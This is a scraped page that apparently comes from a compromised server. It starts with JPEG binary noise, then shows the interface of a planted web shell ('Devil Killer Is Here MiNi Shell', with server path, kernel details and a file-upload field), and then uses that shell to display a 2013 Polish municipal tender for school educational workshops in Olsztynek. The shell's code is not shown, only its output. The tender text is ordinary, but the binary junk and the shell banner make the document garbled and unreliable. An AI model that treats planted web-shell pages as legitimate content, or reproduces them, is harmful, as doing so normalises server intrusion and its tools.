JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130826/342578-N-2013.html

<p class="kh_header"><b>Olsztynek: Usługa edukacyjna w ramach realizacji projektu pn. Kompetencje kluczowe otworzą twoją głowę</b><br>
<b>Numer ogłoszenia: 342578 - 2013; data zamieszczenia: 26.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olsztynek reprezentowana przez Burmistrza Olsztynka , ul. Ratusz 1, 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 089 5192799, 5192705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.olsztynek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa edukacyjna w ramach realizacji projektu pn. Kompetencje kluczowe otworzą twoją głowę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia: 
1) Realizacja zamówienia obejmuje świadczenie usług rozumianych jako przeprowadzanie zajęć edukacyjnych na poziomie właściwym dla uczniów klas 4, 5 i 6. Celem głównym usługi jest wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. Programem objętych zostanie 270 uczniów (136 chłopców i 134 dzieci), poprzez rozwijanie kompetencji kluczowych z wykorzystaniem innowacyjnych metod nauczania w Szkole Podstawowej w Olsztynku.
2) Warsztaty realizowane będą poprzez innowacyjne formy nauczania, metody aktywizujące, które pobudzą wyobraźnię, kreatywność i rozwijać umiejętności kluczowe uczniów.
3) Uczniowie będą samodzielnie tworzyć, doświadczać eksperymentować z twórczością, uczyć się pomysłowości i twórczego myślenia przy wykorzystaniu nowoczesnych pomocy dydaktycznych. Niekonwencjonalne formy i metody pracy oznaczają zezwolenie dzieciom na pewną swobodę działania , dokonywanie wyborów. Stworzą możliwość wszechstronnego i optymalnego rozwoju wszystkich dyspozycji poznawczych, w tym głównie zdolności twórczego myślenia.  Przyczynią się do rozwoju komunikacji interpersonalnej, zwiększenia motywacji do podejmowania działań ukierunkowanych na rozwijanie własnych umiejętności.

4) Warsztaty polonistyczne będą opierały się na treningu kreatywnego i twórczego myślenia. Uczniowie nabędą kompetencje komunikacyjne w mowie i piśmie, nauczą się krytycznie przetwarzać informacje oraz operować słowem, kreując rzeczywistość i tworząc własne teksty ukazujące indywidualny sposób postrzegania świata. 
a) Przykładowe metody aktywizujące: projekt, debata, meta plan, przekład intersemiotyczny.
b) Finał programu: 2 książki napisane przez uczniów, 2 listy otwarte do władz miasta Olsztynek, 2 akcje propagujące pożądane postawy wśród uczniów, 2 debaty Czy jestem kowalem własnego losu?
c) Warsztaty odbywać się będą raz w tygodniu (1 raz w tygodniu) po 2 godziny.
d) Rok szkolny 2013 / 2014 zajęcia grupy I: 15 osób. 72 godziny 
e) Rok szkolny 2014 / 2015 zajęcia grupy I: 15 osób. 72 godziny
(1h = 45 minut)
5) Warsztaty języka angielskiego mają na celu rozwijanie zdolności językowych, poszerzanie wiedzy z zakresu  struktur gramatycznych i leksykalnych oraz zdobywanie wiadomości o kulturze krajów anglojęzycznych. Uczniowie będą zdobywać umiejętności jak najbardziej naturalnego posługiwania się językiem angielskim w sytuacjach życia codziennego.
a) Przykładowe metody aktywizujące: drabina, gry sensoryczne, drama, zabawy sytuacyjne, e- learning, praca z tablicą multimedialną.
b) Finał programu: 2 karaoke, 2 foldery dla obcokrajowców, 2 prezentacje multimedialne o Olsztynku w języku angielskim.
c) Warsztaty odbywać się będą raz w tygodniu (1 raz w tygodniu) po 2 godziny.
d) Rok szkolny 2013 / 2014 zajęcia grupy I: 15 osób. 72 godziny
e) Rok szkolny 2014 / 2015 zajęcia grupy I: 15 osób. 72 godziny
(1h = 45 minut)

6) Warsztaty matematyczne to poszerzenie i pogłębienie wiadomości, umiejętności matematycznych, rozwijanie pomysłowości w myśleniu i działaniu, a także ukazywanie praktyczne i powszechne liczb w życiu codziennym.
a) Przykładowe zadania realizowane w trakcie zajęć: pomiar boiska w nietypowy sposób np. podręcznikami, robienie zakupów, planowanie przyjęcia, zakładanie lokat, budowanie brył.
b) Finał programu: 2 szkolne zbiory zagadek, łamigłówek, krzyżówek, 2 albumy Matematyka w moim życiu, 2 konkursy na najciekawszą matematyczna ozdobę choinkową, 2 własnoręczne gry matematyczne, np. domino.
c) Warsztaty odbywać się będą raz w tygodniu (1 raz w tygodniu) po 2 godziny.
d) Rok szkolny 2013 / 2014 zajęcia grupy I: 15 osób. 72 godziny
e) Rok szkolny 2014 / 2015 zajęcia grupy I: 15 osób. 72 godziny
(1h = 45 minut)

7) Warsztaty robotyki opierają się na bazie zestawów edukacyjnych klocków typu LEGO wyposażonych w minikomputer, czujniki i silnik.  
a) Przykładowe zadania realizowane w trakcie zajęć: Uczniowie będą składać robota i wprawiać go w ruch. Konstruując robota uczniowie rozumują w matematyczny sposób i rozwijają zdolność naukowego wnioskowania.
b) Finał programu: 6 wystaw robotów.
c) Warsztaty odbywać się będą raz w tygodniu (1 raz w tygodniu) po 2 godziny.
d) Rok szkolny 2013 / 2014 zajęcia grupy I: 15 osób. 72 godziny
e) Rok szkolny 2014 / 2015 zajęcia grupy I: 15 osób. 72 godziny
(1h = 45 minut)
Wykonawca na własny koszt zapewnia asortyment do prowadzenia zajęć z robotyki.

8) Warsztaty przyrodnicze to odkrywanie najbliższego otoczenia  poprzez doświadczenia, obserwacje i pokazy.
a) Przykładowe metody aktywizujące: ćwiczenia laboratoryjne, produkcyjne i ewaluacyjne
b) Finał programu: 2 boogi - zdjęcia i filmy z zajęć przyrodniczo - ekologicznych, 2 filmy Zakładanie hodowli rybek, 2 mapy obserwacji przyrodniczych, 2 albumy roślin i zwierząt miejskich i leśnych na terenie gminy Olsztynek.
c) Warsztaty odbywać się będą raz w tygodniu (1 raz w tygodniu) po 2 godziny.
d) Rok szkolny 2013 / 2014 zajęcia grupy I: 20 osób. 72 godziny
e) Rok szkolny 2014 / 2015 zajęcia grupy I: 20 osób. 72 godziny
(1h = 45 minut)

9) Warsztaty informatyczne: to przygotowanie ucznia do aktywnego i odpowiedzialnego życia w społeczeństwie informacyjnym oraz do sprawnego posługiwania się dostępnym sprzętem komputerowym (tabletami) i oprogramowaniem w celu rozwiązywania problemów za pomocą programów użytkowych.
a) Przykładowe zadania realizowane w trakcie zajęć: redagowanie tekstów, tworzenie strony internetowej poświęconej Projektowi, prezentacje multimedialne.
b) Finał programu: 2 foldery o Olsztynku, 2 foldery o projekcie, 2 foldery o szkole, 6 artykułów do gazety lokalnej ALBO  i do strony Olsztynka, 1 strona internetowa dotycząca Projektu.
c) Warsztaty odbywać się będą raz w tygodniu (1 raz w tygodniu) po 2 godziny.
d) Rok szkolny 2013 / 2014 zajęcia grupy I: 20 osób. 72 godziny
e) Rok szkolny 2014 / 2015 zajęcia grupy I: 20 osób. 72 godziny
(1h = 45 minut)

10) Warsztaty plastyczne: to działalność plastyczna umożliwiająca uczniom wyrażanie siebie poprzez różnorodne środki z wykorzystaniem wrodzonych zdolności.
a) Przykładowe metody aktywizujące: komponowanie prac plastycznych, poznawanie nowych technik plastycznych, rysunek oraz malarstwo w pracowni oraz w plenerze, rozwijanie zamiłowania do stuki., wykorzystanie technologii komputerowej w trakcie obróbki wykonanych samodzielnie zdjęć.
b) Finał programu: 2 kroniki projektu, 2 albumy o Olsztynku, 8 wystaw plastycznych, 2 prezentacje multimedialne dotyczące działań Projektowych.
c) Warsztaty odbywać się będą raz w tygodniu (1 raz w tygodniu) po 2 godziny.
d) Rok szkolny 2013 / 2014 zajęcia grupy I: 15 osób. 72 godziny,
e) Rok szkolny 2014 / 2015 zajęcia grupy I: 20 osób. 72 godziny.
(1h = 45 minut)

11) Warsztaty instrumentalne: celem zajęć jest stworzenie uczniom możliwości rozwijania zainteresowań oraz uzdolnień muzycznych.
a) Przykładowe metody aktywizujące: nauka gry na gitarze.
b) Finał programu: 2 przedstawienia, 4 popisy instrumentalne.
c) Warsztaty odbywać się będą raz w tygodniu (1 raz w tygodniu) po 2 godziny.
d) Rok szkolny 2013 / 2014 zajęcia grupy I: 15 osób. 72 godziny
e) Rok szkolny 2014 / 2015 zajęcia grupy I: 20 osób. 72 godziny
(1h = 45 minut)

12) Wykonawca zobowiązuje się do opracowania i przedłożenia Zamawiającemu, w terminie 7 dni od dnia podpisania umowy, programu i planu pracy i przedstawienia go do akceptacji kierownikowi projektu.
13) Wykonawca przygotowując w/w dokumenty, powinien zapoznać się z następującymi dokumentami:
a) wnioskiem o dofinansowanie projektu, 
b) Zasadami przygotowania, realizacji i rozliczania projektów realizowanych w ramach Programu Operacyjnego Kapitał Ludzki,
c) dokumentacją Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej, jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
d) diagnozą i analizą potrzeb dzieci biorących udział w projekcie, przeprowadzaną przez powołany do tego celu zespół nauczycieli i  dostępną w szkole.
14) Zamawiający udostępni wykonawcy w/w dokumenty najpóźniej w dniu podpisania umowy.
15) Wykonawca będzie prowadził zajęcia zgodnie z przedstawionym mu harmonogramem. 
16) Wykonawca zobowiązany będzie do dokumentowania zajęć dodatkowych poprzez przygotowywanie i przekazywanie w terminie końca każdego miesiąca do akceptacji kierownikowi projektu: dziennika zajęć, kart czasu pracy, list obecności i harmonogramu przeprowadzonych zajęć.
17) Wykonawca zobowiązany będzie do prowadzenia dzienników zajęć wraz z listą obecności zgodnie z obowiązującymi przepisami.
18) Wykonawca zobowiązany będzie do przygotowania raportu wykonawczego z każdych zajęć, sprawozdania po zakończeniu zadania oraz ankiet ewaluacyjnych wypełnianych przez rodziców.
Wykonawca będzie poddany działaniom monitoringowym - obserwacji zajęć - raz w roku. 
19) Wykonawca będzie ponosił odpowiedzialność materialną za powierzone mienie tj. materiały i pomoce dydaktyczne udostępnione do prowadzenia zajęć - zajęcia prowadzone przez Wykonawcę winny uwzględniać zastosowanie powyższych pomocy dydaktycznych w jak największym stopniu, o ile charakter danego rodzaju zajęć umożliwia i uzasadnia ich stosowanie,
20) Wykonawca ma obowiązek prowadzenia zajęć metodami aktywizującymi z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych.
21) W przypadku niemożności prowadzenia usługi edukacyjnej wykonawca będzie miał obowiązek we własnym zakresie przedstawić zastępstwo osoby o wymaganych w postępowaniu w danej części kwalifikacjach, po wcześniejszym pisemnych poinformowaniu  o zaistniałej sytuacji koordynatora projektu i uzyskaniu jego zgody..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca zobowiązany jest udowodnić, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert - a jeśli okres prowadzenia działalności jest krótszy, w tym okresie - realizował lub współrealizował:

projekty finansowane lub współfinansowane przez Unię Europejską, których przedmiotem realizacji były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia, tj. obejmujące usługi edukacyjne lub szkoleniowe, a wartość choćby jednego z tych projektów wynosiła co najmniej 100 tys. zł brutto. 

Kryterium oceny ofert stanowi łączna ilość (liczba) projektów, która zostanie poddana ocenie. 

b) W przypadku, gdy Wykonawca nie realizował (współrealizował) projektów finansowanych (współfinansowanych)  przez Unię Europejską, lub oprócz niż realizował inne projekty edukacyjne lub szkoleniowe, może potwierdzić spełnianie warunków udziału w postępowaniu poprzez udowodnienie, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert - a jeśli okres prowadzenia działalności jest krótszy, w tym okresie - realizował lub współrealizował:

projekty nie finansowanie / współfinansowanie przez Unię Europejską których przedmiotem realizacji były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia, tj. obejmujące usługi edukacyjne lub szkoleniowe, a wartość choćby jednego z tych projektów wynosiła co najmniej 100 tys. zł brutto. 


WYJAŚNIENIE: Za realizację lub współrealizację projektów zamawiający rozumie zarówno działanie w charakterze Beneficjenta projektu oraz działanie jako Wykonawcy, który przyczynił się do zrealizowania założeń projektowych - wykonania usługi głównej (szkoleniowo-edukacyjnej); dla oceny spełniania warunku nieistotny jest rodzaj stosunku prawnego łączący współrealizatorów. 

Kryterium oceny ofert stanowi łączny czas trwania tych usług.


c) W każdym z Wykonawców zobowiązany jest udowodnić, dodatkowo iż w okresie ostatnich trzech lat przed upływem terminu składania ofert - a jeśli okres prowadzenia działalności jest krótszy, w tym okresie - realizował lub współrealizował projekty obejmujące usługi edukacyjne lub szkoleniowe w których zakresie znajdowały się zajęcia z zakresu robotyki na bazie klocków LEGO lub w technice podobnej tj. polegającej na budowie ruchomych robotów z klocków, roboty sterowane za pomocą minikomputera.

Wykazanie zajęć z robotyki będzie punktowanie dzielnie.
Zajęcia z robotyki mogą stanowić część programu realizowanego w ramach projektów z lit. a) i b).
Kryterium oceny ofert stanowi łączna ilość (liczba) zajęć z robotyki, która zostanie poddana ocenie. 


Zamawiający oceni spełnianie warunku udziału w postępowaniu na postawie oświadczenia o spełnianiu warunków udziału w postępowaniu stanowiącego załącznik nr 2 do SIWZ oraz Wykazu wykonanych usług załącznik nr 3 oraz dowodów potwierdzających czy usługi zostały wykonane należycie; tj. poświadczeń lub oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.

Wykonawca, w miejsce poświadczeń, o których mowa wyżej może przedkładać dokumenty potwierdzające należyte wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt. 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia ww. warunek, Zamawiający wymaga, by złożył oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca wykaże, iż dysponuje lub w celu realizacji zamówienia będzie dysponował zespołem osób  zdolnych do wykonania zamówienia tzn.:
- co najmniej jedną osobą posiadającą wykształcenie wyższe pedagogiczne z zakresu języka polskiego.
- co najmniej jedną osobą posiadającą wykształcenie wyższe pedagogiczne z zakresu języka angielskiego,
- co najmniej jedną osobą posiadającą wykształcenie wyższe pedagogiczne z zakresu matematyki.
- co najmniej jedną osobą posiadającą wykształcenie wyższe pedagogiczne z zakresu informatyki,
- co najmniej jedną osobą posiadającą wykształcenie wyższe pedagogiczne z zakresu muzyki,
- co najmniej jedną osobą posiadającą wykształcenie wyższe pedagogiczne z zakresu biologii,
- co najmniej jedną osobą posiadającą wykształcenie wyższe pedagogiczne z zakresu plastyki / sztuk pięknych.

Każda z w/w osób musi posiadać co najmniej stopnień nauczyciela i co najmniej 1 rok doświadczenia w  prowadzeniu zajęć w posiadanej przez siebie specjalności.

Posiadanie stopnia nauczyciela mianowanego i co najmniej 3 - letniego stażu pracy pedagogicznej przy prowadzeniu zajęć w posiadanej przez siebie specjalności będzie punktowane dodatkowo. 

b) Każdy Wykonawca zobowiązany jest również wykazać, iż dysponuje lub w celu realizacji zamówienia będzie dysponował co najmniej jedną osobą posiadającą  doświadczenie w prowadzeniu zajęć z robotyki na bazie klocków LEGO lub w technice podobnej tj. polegającej na budowie ruchomych robotów z klocków, roboty sterowane za pomocą minikomputera.


Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów o których mowa w rozdziale VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia ww. warunek, Zamawiający wymaga, by złożył oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz ofertowy - załącznik nr 1 do SIWZ.
